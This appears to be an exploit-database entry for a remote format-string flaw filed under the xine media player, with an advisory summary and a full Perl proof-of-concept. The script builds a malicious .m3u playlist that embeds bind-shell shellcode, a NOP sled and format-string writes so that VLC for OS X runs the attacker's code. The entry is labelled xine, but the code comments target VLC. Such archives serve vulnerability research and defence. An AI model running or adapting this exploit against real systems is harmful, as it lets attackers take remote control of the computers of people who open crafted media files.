header-logo
Suggest Exploit
vendor:
xine
by:
Kevin Finisterre
7.5
CVSS
HIGH
Remote Format String
134
CWE
Product Name: xine
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Not provided
CPE: a:xine_project:xine
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Remote Format String Vulnerability in xine

The 'xine' program is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function. Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the application and to compromise affected computers.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22252/info

The 'xine' program is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function.

Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the application and to compromise affected computers.

This issue may be related to the vulnerability discussed in BID 21852 (VideoLan VLC Media Player Remote Format String Vulnerability); this has not been confirmed. 

#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-x86.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This exploit will create a malicious .m3u file that will cause VLC 
Player for OSX to execute arbitrary code.
#

$outfile = "pwnage.m3u";

$bindshell =
"\x6a\x42\x58\xcd\x80\x6a\x61\x58\x99\x52\x68\x10\x02\x11\x5c\x89" .
"\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a" .
"\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97" .
"\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49\x0f\x89\xf1\xff" .
"\xff\xff\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50" .
"\x54\x54\x53\x53\xb0\x3b\xcd\x80";

# MALLOC                 02800000-03008000 [ 8224K] rw-/rwx SM=COW  
...e_0x1300000
# Pattern found @ 0x298589e
# Pattern found @ 0x298ba92

$jmpaddr = 0x41424344;

$lo = ($jmpaddr >> 0) & 0xffff;
$hi = ($jmpaddr >> 16) & 0xffff;

printf "jump address is: 0x%x%x\n", $hi, $lo;

$format = "%25" . ($lo-0x24) . "d" . "%25" . "23" . "%24" . "hn" . "%25" 
. ($hi-$lo) . "d" . "%25" . "24" . "%24" . "hn" ;

$writeaddr = 0xa0011393 ; # <dyld_stub___vfprintf>

printf "writing to file: %s\n", $outfile;
open(PWNED,">$outfile");

print PWNED "#EXTM3U\n" . "#EXTINF:0,1-07 " . "\x90" x 50 . $bindshell . 
"\n" .
"udp://--" . pack('l', $writeaddr+2) . pack('l', $writeaddr) .
$format . "i" x (999 - length("Can't get file status for ") ) . "\n";

close(PWNED);